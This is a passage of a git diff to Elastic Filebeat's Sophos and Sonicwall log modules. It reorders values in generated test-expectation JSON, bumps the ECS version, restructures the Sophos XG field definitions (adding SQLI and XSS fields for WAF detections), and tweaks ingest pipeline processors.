"10.251.248.228" ], "rsa.internal.event_desc": "volupt", "rsa.internal.messageid": "606", 
@@ -1861,8 +1861,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.105.46.101", - "10.50.44.5" + "10.50.44.5", + "10.105.46.101" ], "rsa.internal.messageid": "237", "rsa.misc.action": [ @@ -2048,8 +2048,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.102.166.19", - "10.104.49.142" + "10.104.49.142", + "10.102.166.19" ], "rsa.internal.messageid": "252", "rsa.internal.msg": "eprehend", @@ -2218,8 +2218,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.191.242.168", - "10.165.48.224" + "10.165.48.224", + "10.191.242.168" ], "rsa.internal.event_desc": "equep", "rsa.internal.messageid": "995", @@ -2304,8 +2304,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.219.42.212", - "10.57.85.98" + "10.57.85.98", + "10.219.42.212" ], "rsa.internal.event_desc": "mquisno", "rsa.internal.messageid": "995", @@ -2385,8 +2385,8 @@ "ugitsedq5067.internal.test" ], "related.ip": [ - "10.132.171.15", - "10.107.216.138" + "10.107.216.138", + "10.132.171.15" ], "rsa.internal.messageid": "537", "rsa.misc.action": [ @@ -2477,8 +2477,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.22.244.71", - "10.142.120.198" + "10.142.120.198", + "10.22.244.71" ], "related.user": [ "usmo" @@ -2598,8 +2598,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.56.10.84", - "10.12.54.142" + "10.12.54.142", + "10.56.10.84" ], "rsa.internal.messageid": "658", "rsa.internal.msg": "osquirat", @@ -2715,8 +2715,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.200.122.184", - "10.57.255.4" + "10.57.255.4", + "10.200.122.184" ], "rsa.identity.user_sid_dst": "sBon", "rsa.internal.event_desc": "fic", diff --git a/x-pack/filebeat/module/sophos/fields.go b/x-pack/filebeat/module/sophos/fields.go index b8320ff3f9b..7cd57e1bb32 100644 
--- a/x-pack/filebeat/module/sophos/fields.go +++ b/x-pack/filebeat/module/sophos/fields.go @@ -19,5 +19,5 @@ func init() { // AssetSophos returns asset data. // This is the base64 encoded gzipped contents of module/sophos. func AssetSophos() string { - return "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" + return "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" } diff --git a/x-pack/filebeat/module/sophos/utm/config/input.yml b/x-pack/filebeat/module/sophos/utm/config/input.yml index 0d4e59f4f42..9e7cd0d16c5 100644 --- a/x-pack/filebeat/module/sophos/utm/config/input.yml +++ b/x-pack/filebeat/module/sophos/utm/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/sophos/utm/test/generated.log-expected.json b/x-pack/filebeat/module/sophos/utm/test/generated.log-expected.json index e998e20910c..7fc70f46e97 100644 --- a/x-pack/filebeat/module/sophos/utm/test/generated.log-expected.json +++ b/x-pack/filebeat/module/sophos/utm/test/generated.log-expected.json @@ -55,13 +55,13 @@ "ercit2385.internal.home" ], "related.ip": [ - "10.47.202.102", - "10.57.170.140" + "10.57.170.140", + "10.47.202.102" ], "related.user": [ "dexeac", - "icistatuscode=giatquov", - "sunt" + "sunt", + "icistatuscode=giatquov" ], "rsa.db.index": "run", "rsa.identity.logon_type": "nofdeF", @@ -70,8 +70,8 @@ "rsa.investigations.event_cat": 1901000000, "rsa.investigations.event_cat_name": "Other.Default", "rsa.misc.action": [ - "ugiatnu", - "block" + "block", + "ugiatnu" ], "rsa.misc.comments": "colabo", "rsa.misc.content_type": "sedd", @@ -887,8 +887,8 @@ "elites4713.www.localhost" ], "related.ip": [ - "10.52.190.18", - "10.161.51.135" + "10.161.51.135", + "10.52.190.18" ], "rsa.internal.event_desc": "portscan", "rsa.internal.messageid": "ulogd", 
@@ -974,8 +974,8 @@ "10.232.108.32" ], "related.user": [ - "rsp", - "llum" + "llum", + "rsp" ], "rsa.identity.logon_type": "ntut", "rsa.internal.event_desc": "ittenb", @@ -1048,8 +1048,8 @@ "rsa.investigations.event_cat": 1901000000, "rsa.investigations.event_cat_name": "Other.Default", "rsa.misc.action": [ - "deny", - "iuntN" + "iuntN", + "deny" ], "rsa.misc.comments": "onorume", "rsa.misc.content_type": "lapa", @@ -1610,8 +1610,8 @@ "10.244.96.61" ], "related.user": [ - "iumt", - "itsedqui" + "itsedqui", + "iumt" ], "rsa.identity.logon_type": "psamvolu", "rsa.internal.event_desc": "orroqui", @@ -1855,8 +1855,8 @@ "10.98.126.206" ], "related.user": [ - "isnostru", "amremapstatuscode=dolorsit", + "isnostru", "hen" ], "rsa.db.index": "spernatu", @@ -1866,8 +1866,8 @@ "rsa.investigations.event_cat": 1901000000, "rsa.investigations.event_cat_name": "Other.Default", "rsa.misc.action": [ - "block", - "nsectetu" + "nsectetu", + "block" ], "rsa.misc.comments": "uaer", "rsa.misc.content_type": "eaqu", @@ -1924,8 +1924,8 @@ "observer.vendor": "Sophos", "process.pid": 6722, "related.ip": [ - "10.203.157.250", - "10.32.236.117" + "10.32.236.117", + "10.203.157.250" ], "rsa.internal.event_desc": "Packet", "rsa.internal.messageid": "ulogd", @@ -2033,9 +2033,9 @@ "10.2.24.156" ], "related.user": [ - "ulpaq", - "dolorsistatuscode=acc", "ntoccae", + "dolorsistatuscode=acc", + "ulpaq", "Sedutper" ], "rsa.db.index": "snisiut", @@ -2045,8 +2045,8 @@ "rsa.investigations.event_cat": 1901000000, "rsa.investigations.event_cat_name": "Other.Default", "rsa.misc.action": [ - "block", - "icons" + "icons", + "block" ], "rsa.misc.comments": "porincid", "rsa.misc.content_type": "temvele", @@ -2120,13 +2120,13 @@ "mni4032.lan" ], "related.ip": [ - "10.202.65.2", - "10.180.169.49" + "10.180.169.49", + "10.202.65.2" ], "related.user": [ - "tasu", + "iscivelistatuscode=urve", "atatno", - "iscivelistatuscode=urve" + "tasu" ], "rsa.db.index": "amrem", "rsa.identity.logon_type": "nulamcol", 
@@ -2314,13 +2314,13 @@ "obea2960.mail.corp" ], "related.ip": [ - "10.33.138.154", - "10.45.12.53" + "10.45.12.53", + "10.33.138.154" ], "related.user": [ + "porincid", "umqustatuscode=ntexpli", - "eturadip", - "porincid" + "eturadip" ], "rsa.db.index": "dolor", "rsa.identity.logon_type": "eturadi", @@ -2632,10 +2632,10 @@ "10.210.175.52" ], "related.user": [ - "rExce", "inimastatuscode=emipsum", "reetd", - "Loremi" + "Loremi", + "rExce" ], "rsa.db.index": "apa", "rsa.identity.logon_type": "sedquia", @@ -3619,8 +3619,8 @@ "10.96.200.83" ], "related.user": [ - "acommod", - "lapariat" + "lapariat", + "acommod" ], "rsa.identity.logon_type": "remeumf", "rsa.internal.event_desc": "dol", diff --git a/x-pack/filebeat/module/sophos/xg/_meta/fields.yml b/x-pack/filebeat/module/sophos/xg/_meta/fields.yml index dca81ddc4e6..b74eac567b5 100644 --- a/x-pack/filebeat/module/sophos/xg/_meta/fields.yml +++ b/x-pack/filebeat/module/sophos/xg/_meta/fields.yml 
@@ -1,940 +1,946 @@ -- name: sophos +- name: sophos.xg type: group + release: beta + default_field: false description: > + Module for parsing sophosxg syslog. fields: - - name: xg - type: group - release: beta - default_field: false - description: > - Module for parsing sophosxg syslog. - fields: - - name: device - type: keyword - description: > - device - - - name: date - type: date - description: > - Date (yyyy-mm-dd) when the event occurred - - - name: timezone - type: keyword - description: > - Time (hh:mm:ss) when the event occurred - - - name: device_name - type: keyword - description: > - Model number of the device - - - name: device_id - type: keyword - description: > - Serial number of the device - - - name: log_id - type: keyword - description: > - Unique 12 characters code (0101011) - - - name: log_type - type: keyword - description: > - Type of event e.g. firewall event - - - name: log_component - type: keyword - description: > - Component responsible for logging e.g. Firewall rule - - - name: log_subtype - type: keyword - description: > - Sub type of event - - - name: hb_health - type: keyword - description: > - Heartbeat status - - - name: priority - type: keyword - description: > - Severity level of traffic - - - name: status - type: keyword - description: > - Ultimate status of traffic – Allowed or Denied - - - name: duration - type: long - description: > - Durability of traffic (seconds) - - - name: fw_rule_id - type: integer - description: > - Firewall Rule ID which is applied on the traffic - - - name: user_name - type: keyword - description: > - user_name - - - name: user_group - type: keyword - description: > - Group name to which the user belongs - - - name: iap - type: keyword - description: > - Internet Access policy ID applied on the traffic - - - name: ips_policy_id - type: integer - description: > - IPS policy ID applied on the traffic - - - name: policy_type - type: keyword - description: > - Policy type applied to the traffic - - - 
name: appfilter_policy_id - type: integer - description: > - Application Filter policy applied on the traffic - - - name: application_filter_policy - type: integer - description: > - Application Filter policy applied on the traffic - - - name: application - type: keyword - description: > - Application name - - - name: application_name - type: keyword - description: > - Application name - - - name: application_risk - type: keyword - description: > - Risk level assigned to the application - - - name: application_technology - type: keyword - description: > - Technology of the application - - - name: application_category - type: keyword - description: > - Application is resolved by signature or synchronized application - - - name: appresolvedby - type: keyword - description: > - Technology of the application - - - name: app_is_cloud - type: keyword - description: > - Application is Cloud - - - name: in_interface - type: keyword - description: > - Interface for incoming traffic, e.g., Port A - - - name: out_interface - type: keyword - description: > - Interface for outgoing traffic, e.g., Port B - - - name: src_ip - type: ip - description: > - Original source IP address of traffic - - - name: src_mac - type: keyword - description: > - Original source MAC address of traffic - - - name: src_country_code - type: keyword - description: > - Code of the country to which the source IP belongs - - - name: dst_ip - type: ip - description: > - Original destination IP address of traffic - - - name: dst_country_code - type: keyword - description: > - Code of the country to which the destination IP belongs - - - name: protocol - type: keyword - description: > - Protocol number of traffic - - - name: src_port - type: integer - description: > - Original source port of TCP and UDP traffic - - - name: dst_port - type: integer - description: > - Original destination port of TCP and UDP traffic - - - name: icmp_type - type: keyword - description: > - ICMP type of ICMP traffic - - - name: 
icmp_code - type: keyword - description: > - ICMP code of ICMP traffic - - - name: sent_pkts - type: long - description: > - Total number of packets sent - - - name: received_pkts - type: long - description: > - Total number of packets received - - - name: sent_bytes - type: long - description: > - Total number of bytes sent - - - name: recv_bytes - type: long - description: > - Total number of bytes received - - - name: trans_src_ ip - type: ip - description: > - Translated source IP address for outgoing traffic - - - name: trans_src_port - type: integer - description: > - Translated source port for outgoing traffic - - - name: trans_dst_ip - type: ip - description: > - Translated destination IP address for outgoing traffic - - - name: trans_dst_port - type: integer - description: > - Translated destination port for outgoing traffic - - - name: srczonetype - type: keyword - description: > - Type of source zone, e.g., LAN - - - name: srczone - type: keyword - description: > - Name of source zone - - - name: dstzonetype - type: keyword - description: > - Type of destination zone, e.g., WAN - - - name: dstzone - type: keyword - description: > - Name of destination zone - - - name: dir_disp - type: keyword - description: > - TPacket direction. Possible values:“org”, “reply”, “” - - - name: connevent - type: keyword - description: > - Event on which this log is generated - - - name: conn_id - type: integer - description: > - Unique identifier of connection - - - name: vconn_id - type: integer - description: > - Connection ID of the master connection - - - name: idp_policy_id - type: integer - description: > - IPS policy ID which is applied on the traffic - - - name: idp_policy_name - type: keyword - description: > - IPS policy name i.e. 
IPS policy name which is applied on the traffic - - - name: signature_id - type: keyword - description: > - Signature ID - - - name: signature_msg - type: keyword - description: > - Signature messsage - - - name: classification - type: keyword - description: > - Signature classification - - - name: rule_priority - type: keyword - description: > - Priority of IPS policy - - - name: platform - type: keyword - description: > - Platform of the traffic. - - - name: category - type: keyword - description: > - IPS signature category. - - - name: target - type: keyword - description: > - Platform of the traffic. - - - name: eventid - type: keyword - description: > - ATP Evenet ID - - - name: ep_uuid - type: keyword - description: > - Endpoint UUID - - - name: threatname - type: keyword - description: > - ATP threatname - - - name: sourceip - type: ip - description: > - Original source IP address of traffic - - - name: destinationip - type: ip - description: > - Original destination IP address of traffic - - - name: login_user - type: keyword - description: > - ATP login user - - - name: eventtype - type: keyword - description: > - ATP event type - - - name: execution_path - type: keyword - description: > - ATP execution path - - - name: av_policy_name - type: keyword - description: > - Malware scanning policy name which is applied on the traffic - - - name: from_email_address - type: keyword - description: > - Sender email address - - - name: to_email_address - type: keyword - description: > - Receipeint email address - - - name: subject - type: keyword - description: > - Email subject - - - name: mailsize - type: integer - description: > - mailsize - - - name: virus - type: keyword - description: > - virus name - - - name: FTP_url - type: keyword - description: > - FTP URL from which virus was downloaded - - - name: FTP_direction - type: keyword - description: > - Direction of FTP transfer: Upload or Download - - - name: filesize - type: integer - description: > - Size of 
the file that contained virus - - - name: filepath - type: keyword - description: > - Path of the file containing virus - - - name: filename - type: keyword - description: > - File name associated with the event - - - name: ftpcommand - type: keyword - description: > - FTP command used when virus was found - - - name: url - type: keyword - description: > - URL from which virus was downloaded - - - name: domainname - type: keyword - description: > - Domain from which virus was downloaded - - - name: quarantine - type: keyword - description: > - Path and filename of the file quarantined - - - name: src_domainname - type: keyword - description: > - Sender domain name - - - name: dst_domainname - type: keyword - description: > - Receiver domain name - - - name: reason - type: keyword - description: > - Reason why the record was detected as spam/malicious - - - name: referer - type: keyword - description: > - Referer - - - name: spamaction - type: keyword - description: > - Spam Action - - - name: mailid - type: keyword - description: > - mailid - - - name: quarantine_reason - type: keyword - description: > - Quarantine reason - - - name: status_code - type: keyword - description: > - Status code - - - name: override_token - type: keyword - description: > - Override token - - - name: con_id - type: integer - description: > - Unique identifier of connection - - - name: override_authorizer - type: keyword - description: > - Override authorizer - - - name: transactionid - type: keyword - description: > - Transaction ID of the AV scan. - - - name: upload_file_type - type: keyword - description: > - Upload file type - - - name: upload_file_name - type: keyword - description: > - Upload file name - - - name: httpresponsecode - type: long - description: > - code of HTTP response - - - name: user_gp - type: keyword - description: > - Group name to which the user belongs. 
- - - name: category_type - type: keyword - description: > - Type of category under which website falls - - - name: download_file_type - type: keyword - description: > - Download file type - - - name: exceptions - type: keyword - description: > - List of the checks excluded by web exceptions. - - - name: contenttype - type: keyword - description: > - Type of the content - - - name: override_name - type: keyword - description: > - Override name - - - name: activityname - type: keyword - description: > - Web policy activity that matched and caused the policy result. - - - name: download_file_name - type: keyword - description: > - Download file name - - - name: sha1sum - type: keyword - description: > - SHA1 checksum of the item being analyzed - - - name: message_id - type: keyword - description: > - Message ID - - - name: connid - type: keyword - description: > - Connection ID - - - name: message - type: keyword - description: > - Message - - - name: email_subject - type: keyword - description: > - Email Subject - - - name: file_path - type: keyword - description: > - File path - - - name: dstdomain - type: keyword - description: > - Destination Domain - - - name: file_size - type: integer - description: > - File Size - - - name: transaction_id - type: keyword - description: > - Transaction ID - - - name: website - type: keyword - description: > - Website - - - name: file_name - type: keyword - description: > - Filename - - - name: context_prefix - type: keyword - description: > - Content Prefix - - - name: site_category - type: keyword - description: > - Site Category - - - name: context_suffix - type: keyword - description: > - Context Suffix - - - name: dictionary_name - type: keyword - description: > - Dictionary Name - - - name: action - type: keyword - description: > - Event Action - - - name: user - type: keyword - description: > - User - - - name: context_match - type: keyword - description: > - Context Match - - - name: direction - type: keyword - 
description: > - Direction - - - name: auth_client - type: keyword - description: > - Auth Client - - - name: auth_mechanism - type: keyword - description: > - Auth mechanism - - - name: connectionname - type: keyword - description: > - Connectionname - - - name: remotenetwork - type: keyword - description: > - remotenetwork - - - name: localgateway - type: keyword - description: > - Localgateway - - - name: localnetwork - type: keyword - description: > - Localnetwork - - - name: connectiontype - type: keyword - description: > - Connectiontype - - - name: oldversion - type: keyword - description: > - Oldversion - - - name: newversion - type: keyword - description: > - Newversion - - - name: ipaddress - type: keyword - description: > - Ipaddress - - - name: client_physical_address - type: keyword - description: > - Client physical address - - - name: client_host_name - type: keyword - description: > - Client host name - - - name: raw_data - type: keyword - description: > - Raw data - - - name: Mode - type: keyword - description: > - Mode - - - name: sessionid - type: keyword - description: > - Sessionid - - - name: starttime - type: date - description: > - Starttime - - - name: remote_ip - type: ip - description: > - Remote IP - - - name: timestamp - type: date - description: > - timestamp - - - name: SysLog_SERVER_NAME - type: keyword - description: > - SysLog SERVER NAME - - - name: backup_mode - type: keyword - description: > - Backup mode - - - name: source - type: keyword - description: > - Source - - - name: server - type: keyword - description: > - Server - - - name: host - type: keyword - description: > - Host - - - name: responsetime - type: long - description: > - Responsetime - - - name: cookie - type: keyword - description: > - cookie - - - name: querystring - type: keyword - description: > - querystring - - - name: extra - type: keyword - description: > - extra - - - name: PHPSESSID - type: keyword - description: > - PHPSESSID - - - name: start_time - 
type: date - description: > - Start time - - - name: eventtime - type: date - description: > - Event time - - - name: red_id - type: keyword - description: > - RED ID - - - name: branch_name - type: keyword - description: > - Branch Name - - - name: updatedip - type: ip - description: > - updatedip - - - name: idle_cpu - type: float - description: > - idle ## - - - name: system_cpu - type: float - description: > - system - - - name: user_cpu - type: float - description: > - system - - - name: used - type: integer - description: > - used - - - name: unit - type: keyword - description: > - unit - - - name: total_memory - type: integer - description: > - Total Memory - - - name: free - type: integer - description: > - free - - - name: transmittederrors - type: keyword - description: > - transmitted errors - - - name: receivederrors - type: keyword - description: > - received errors - - - name: receivedkbits - type: long - description: > - received kbits - - - name: transmittedkbits - type: long - description: > - transmitted kbits - - - name: transmitteddrops - type: long - description: > - transmitted drops - - - name: receiveddrops - type: long - description: > - received drops - - - name: collisions - type: long - description: > - collisions - - - name: interface - type: keyword - description: > - interface - - - name: Configuration - type: float - description: > - Configuration - - - name: Reports - type: float - description: > - Reports - - - name: Signature - type: float - description: > - Signature - - - name: Temp - type: float - description: > - Temp - - - name: users - type: keyword - description: > - users - - - name: ssid - type: keyword - description: > - ssid - - - name: ap - type: keyword - description: > - ap - - - name: clients_conn_ssid - type: keyword - description: > - clients connection ssid + - name: device + type: keyword + description: > + device + + - name: date + type: date + description: > + Date (yyyy-mm-dd) when the event occurred + + - 
name: timezone + type: keyword + description: > + Time (hh:mm:ss) when the event occurred + + - name: device_name + type: keyword + description: > + Model number of the device + + - name: device_id + type: keyword + description: > + Serial number of the device + + - name: log_id + type: keyword + description: > + Unique 12 characters code (0101011) + + - name: log_type + type: keyword + description: > + Type of event e.g. firewall event + + - name: log_component + type: keyword + description: > + Component responsible for logging e.g. Firewall rule + + - name: log_subtype + type: keyword + description: > + Sub type of event + + - name: hb_health + type: keyword + description: > + Heartbeat status + + - name: priority + type: keyword + description: > + Severity level of traffic + + - name: status + type: keyword + description: > + Ultimate status of traffic – Allowed or Denied + + - name: duration + type: long + description: > + Durability of traffic (seconds) + + - name: fw_rule_id + type: integer + description: > + Firewall Rule ID which is applied on the traffic + + - name: user_name + type: keyword + description: > + user_name + + - name: user_group + type: keyword + description: > + Group name to which the user belongs + + - name: iap + type: keyword + description: > + Internet Access policy ID applied on the traffic + + - name: ips_policy_id + type: integer + description: > + IPS policy ID applied on the traffic + + - name: policy_type + type: keyword + description: > + Policy type applied to the traffic + + - name: appfilter_policy_id + type: integer + description: > + Application Filter policy applied on the traffic + + - name: application_filter_policy + type: integer + description: > + Application Filter policy applied on the traffic + + - name: application + type: keyword + description: > + Application name + + - name: application_name + type: keyword + description: > + Application name + + - name: application_risk + type: keyword + description: > + Risk 
level assigned to the application + + - name: application_technology + type: keyword + description: > + Technology of the application + + - name: application_category + type: keyword + description: > + Application is resolved by signature or synchronized application + + - name: appresolvedby + type: keyword + description: > + Technology of the application + + - name: app_is_cloud + type: keyword + description: > + Application is Cloud + + - name: in_interface + type: keyword + description: > + Interface for incoming traffic, e.g., Port A + + - name: out_interface + type: keyword + description: > + Interface for outgoing traffic, e.g., Port B + + - name: src_ip + type: ip + description: > + Original source IP address of traffic + + - name: src_mac + type: keyword + description: > + Original source MAC address of traffic + + - name: src_country_code + type: keyword + description: > + Code of the country to which the source IP belongs + + - name: dst_ip + type: ip + description: > + Original destination IP address of traffic + + - name: dst_country_code + type: keyword + description: > + Code of the country to which the destination IP belongs + + - name: protocol + type: keyword + description: > + Protocol number of traffic + + - name: src_port + type: integer + description: > + Original source port of TCP and UDP traffic + + - name: dst_port + type: integer + description: > + Original destination port of TCP and UDP traffic + + - name: icmp_type + type: keyword + description: > + ICMP type of ICMP traffic + + - name: icmp_code + type: keyword + description: > + ICMP code of ICMP traffic + + - name: sent_pkts + type: long + description: > + Total number of packets sent + + - name: received_pkts + type: long + description: > + Total number of packets received + + - name: sent_bytes + type: long + description: > + Total number of bytes sent + + - name: recv_bytes + type: long + description: > + Total number of bytes received + + - name: trans_src_ ip + type: ip + 
description: > + Translated source IP address for outgoing traffic + + - name: trans_src_port + type: integer + description: > + Translated source port for outgoing traffic + + - name: trans_dst_ip + type: ip + description: > + Translated destination IP address for outgoing traffic + + - name: trans_dst_port + type: integer + description: > + Translated destination port for outgoing traffic + + - name: srczonetype + type: keyword + description: > + Type of source zone, e.g., LAN + + - name: srczone + type: keyword + description: > + Name of source zone + + - name: dstzonetype + type: keyword + description: > + Type of destination zone, e.g., WAN + + - name: dstzone + type: keyword + description: > + Name of destination zone + + - name: dir_disp + type: keyword + description: > + TPacket direction. Possible values:“org”, “reply”, “” + + - name: connevent + type: keyword + description: > + Event on which this log is generated + + - name: conn_id + type: integer + description: > + Unique identifier of connection + + - name: vconn_id + type: integer + description: > + Connection ID of the master connection + + - name: idp_policy_id + type: integer + description: > + IPS policy ID which is applied on the traffic + + - name: idp_policy_name + type: keyword + description: > + IPS policy name i.e. IPS policy name which is applied on the traffic + + - name: signature_id + type: keyword + description: > + Signature ID + + - name: signature_msg + type: keyword + description: > + Signature messsage + + - name: classification + type: keyword + description: > + Signature classification + + - name: rule_priority + type: keyword + description: > + Priority of IPS policy + + - name: platform + type: keyword + description: > + Platform of the traffic. + + - name: category + type: keyword + description: > + IPS signature category. + + - name: target + type: keyword + description: > + Platform of the traffic. 
+ + - name: eventid + type: keyword + description: > + ATP Evenet ID + + - name: ep_uuid + type: keyword + description: > + Endpoint UUID + + - name: threatname + type: keyword + description: > + ATP threatname + + - name: sourceip + type: ip + description: > + Original source IP address of traffic + + - name: destinationip + type: ip + description: > + Original destination IP address of traffic + + - name: login_user + type: keyword + description: > + ATP login user + + - name: eventtype + type: keyword + description: > + ATP event type + + - name: execution_path + type: keyword + description: > + ATP execution path + + - name: av_policy_name + type: keyword + description: > + Malware scanning policy name which is applied on the traffic + + - name: from_email_address + type: keyword + description: > + Sender email address + + - name: to_email_address + type: keyword + description: > + Receipeint email address + + - name: subject + type: keyword + description: > + Email subject + + - name: mailsize + type: integer + description: > + mailsize + + - name: virus + type: keyword + description: > + virus name + + - name: ftp_url + type: keyword + description: > + FTP URL from which virus was downloaded + + - name: ftp_direction + type: keyword + description: > + Direction of FTP transfer: Upload or Download + + - name: filesize + type: integer + description: > + Size of the file that contained virus + + - name: filepath + type: keyword + description: > + Path of the file containing virus + + - name: filename + type: keyword + description: > + File name associated with the event + + - name: ftpcommand + type: keyword + description: > + FTP command used when virus was found + + - name: url + type: keyword + description: > + URL from which virus was downloaded + + - name: domainname + type: keyword + description: > + Domain from which virus was downloaded + + - name: quarantine + type: keyword + description: > + Path and filename of the file quarantined + + - name: 
src_domainname + type: keyword + description: > + Sender domain name + + - name: dst_domainname + type: keyword + description: > + Receiver domain name + + - name: reason + type: keyword + description: > + Reason why the record was detected as spam/malicious + + - name: referer + type: keyword + description: > + Referer + + - name: spamaction + type: keyword + description: > + Spam Action + + - name: mailid + type: keyword + description: > + mailid + + - name: quarantine_reason + type: keyword + description: > + Quarantine reason + + - name: status_code + type: keyword + description: > + Status code + + - name: override_token + type: keyword + description: > + Override token + + - name: con_id + type: integer + description: > + Unique identifier of connection + + - name: override_authorizer + type: keyword + description: > + Override authorizer + + - name: transactionid + type: keyword + description: > + Transaction ID of the AV scan. + + - name: upload_file_type + type: keyword + description: > + Upload file type + + - name: upload_file_name + type: keyword + description: > + Upload file name + + - name: httpresponsecode + type: long + description: > + code of HTTP response + + - name: user_gp + type: keyword + description: > + Group name to which the user belongs. + + - name: category_type + type: keyword + description: > + Type of category under which website falls + + - name: download_file_type + type: keyword + description: > + Download file type + + - name: exceptions + type: keyword + description: > + List of the checks excluded by web exceptions. + + - name: contenttype + type: keyword + description: > + Type of the content + + - name: override_name + type: keyword + description: > + Override name + + - name: activityname + type: keyword + description: > + Web policy activity that matched and caused the policy result. 
+ + - name: download_file_name + type: keyword + description: > + Download file name + + - name: sha1sum + type: keyword + description: > + SHA1 checksum of the item being analyzed + + - name: message_id + type: keyword + description: > + Message ID + + - name: connid + type: keyword + description: > + Connection ID + + - name: message + type: keyword + description: > + Message + + - name: email_subject + type: keyword + description: > + Email Subject + + - name: file_path + type: keyword + description: > + File path + + - name: dstdomain + type: keyword + description: > + Destination Domain + + - name: file_size + type: integer + description: > + File Size + + - name: transaction_id + type: keyword + description: > + Transaction ID + + - name: website + type: keyword + description: > + Website + + - name: file_name + type: keyword + description: > + Filename + + - name: context_prefix + type: keyword + description: > + Content Prefix + + - name: site_category + type: keyword + description: > + Site Category + + - name: context_suffix + type: keyword + description: > + Context Suffix + + - name: dictionary_name + type: keyword + description: > + Dictionary Name + + - name: action + type: keyword + description: > + Event Action + + - name: user + type: keyword + description: > + User + + - name: context_match + type: keyword + description: > + Context Match + + - name: direction + type: keyword + description: > + Direction + + - name: auth_client + type: keyword + description: > + Auth Client + + - name: auth_mechanism + type: keyword + description: > + Auth mechanism + + - name: connectionname + type: keyword + description: > + Connectionname + + - name: remotenetwork + type: keyword + description: > + remotenetwork + + - name: localgateway + type: keyword + description: > + Localgateway + + - name: localnetwork + type: keyword + description: > + Localnetwork + + - name: connectiontype + type: keyword + description: > + Connectiontype + + - name: oldversion + type: 
keyword + description: > + Oldversion + + - name: newversion + type: keyword + description: > + Newversion + + - name: ipaddress + type: keyword + description: > + Ipaddress + + - name: client_physical_address + type: keyword + description: > + Client physical address + + - name: client_host_name + type: keyword + description: > + Client host name + + - name: raw_data + type: keyword + description: > + Raw data + + - name: Mode + type: keyword + description: > + Mode + + - name: sessionid + type: keyword + description: > + Sessionid + + - name: starttime + type: date + description: > + Starttime + + - name: remote_ip + type: ip + description: > + Remote IP + + - name: timestamp + type: date + description: > + timestamp + + - name: SysLog_SERVER_NAME + type: keyword + description: > + SysLog SERVER NAME + + - name: backup_mode + type: keyword + description: > + Backup mode + + - name: source + type: keyword + description: > + Source + + - name: server + type: keyword + description: > + Server + + - name: host + type: keyword + description: > + Host + + - name: responsetime + type: long + description: > + Responsetime + + - name: cookie + type: keyword + description: > + cookie + + - name: querystring + type: keyword + description: > + querystring + + - name: extra + type: keyword + description: > + extra + + - name: PHPSESSID + type: keyword + description: > + PHPSESSID + + - name: start_time + type: date + description: > + Start time + + - name: eventtime + type: date + description: > + Event time + + - name: red_id + type: keyword + description: > + RED ID + + - name: branch_name + type: keyword + description: > + Branch Name + + - name: updatedip + type: ip + description: > + updatedip + + - name: idle_cpu + type: float + description: > + idle ## + + - name: system_cpu + type: float + description: > + system + + - name: user_cpu + type: float + description: > + system + + - name: used + type: integer + description: > + used + + - name: unit + type: keyword + 
description: > + unit + + - name: total_memory + type: integer + description: > + Total Memory + + - name: free + type: integer + description: > + free + + - name: transmittederrors + type: keyword + description: > + transmitted errors + + - name: receivederrors + type: keyword + description: > + received errors + + - name: receivedkbits + type: long + description: > + received kbits + + - name: transmittedkbits + type: long + description: > + transmitted kbits + + - name: transmitteddrops + type: long + description: > + transmitted drops + + - name: receiveddrops + type: long + description: > + received drops + + - name: collisions + type: long + description: > + collisions + + - name: interface + type: keyword + description: > + interface + + - name: Configuration + type: float + description: > + Configuration + + - name: Reports + type: float + description: > + Reports + + - name: Signature + type: float + description: > + Signature + + - name: Temp + type: float + description: > + Temp + + - name: users + type: keyword + description: > + users + + - name: ssid + type: keyword + description: > + ssid + + - name: ap + type: keyword + description: > + ap + + - name: clients_conn_ssid + type: keyword + description: > + clients connection ssid + + - name: sqli + type: keyword + description: > + The related SQLI caught by the WAF + + - name: xss + type: keyword + description: > + The related XSS caught by the WAF diff --git a/x-pack/filebeat/module/sophos/xg/config/config.yml b/x-pack/filebeat/module/sophos/xg/config/config.yml index 676d19f05d3..9c21c73ddf9 100644 --- a/x-pack/filebeat/module/sophos/xg/config/config.yml +++ b/x-pack/filebeat/module/sophos/xg/config/config.yml @@ -27,7 +27,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - add_fields: target: '_conf' fields: 
diff --git a/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml b/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml index a5c0b7c32cd..845a93c945e 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml @@ -333,6 +333,14 @@ processors: - lowercase: field: event.info ignore_failure: true +- rename: + field: sophos.xg.FTP_direction + target_field: sophos.xg.ftp_direction + ignore_missing: true +- rename: + field: sophos.xg.FTP_url + target_field: sophos.xg.ftp_url + ignore_missing: true - remove: field: - sophos.xg.dst_port diff --git a/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml b/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml index ef8599270e0..76144a06cff 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml @@ -17,7 +17,7 @@ processors: # split Sophos-XG fields - kv: field: log.original - field_split: " (?=[a-z0-9\\_\\-]+=)" + field_split: " (?=[a-zA-Z0-9\\_\\-]+=)" value_split: "=" prefix: "sophos.xg." ignore_missing: true @@ -29,7 +29,7 @@ processors: field: _temp_.time value: "{{sophos.xg.date}} {{sophos.xg.time}}" - date: - if: "ctx.event.timezone == null" + if: "ctx?.event?.timezone == null" field: _temp_.time target_field: "@timestamp" formats: @@ -38,7 +38,7 @@ processors: - yyyy-MM-dd HH:mm:ss z - ISO8601 - date: - if: "ctx.event.timezone != null" + if: "ctx?.event?.timezone 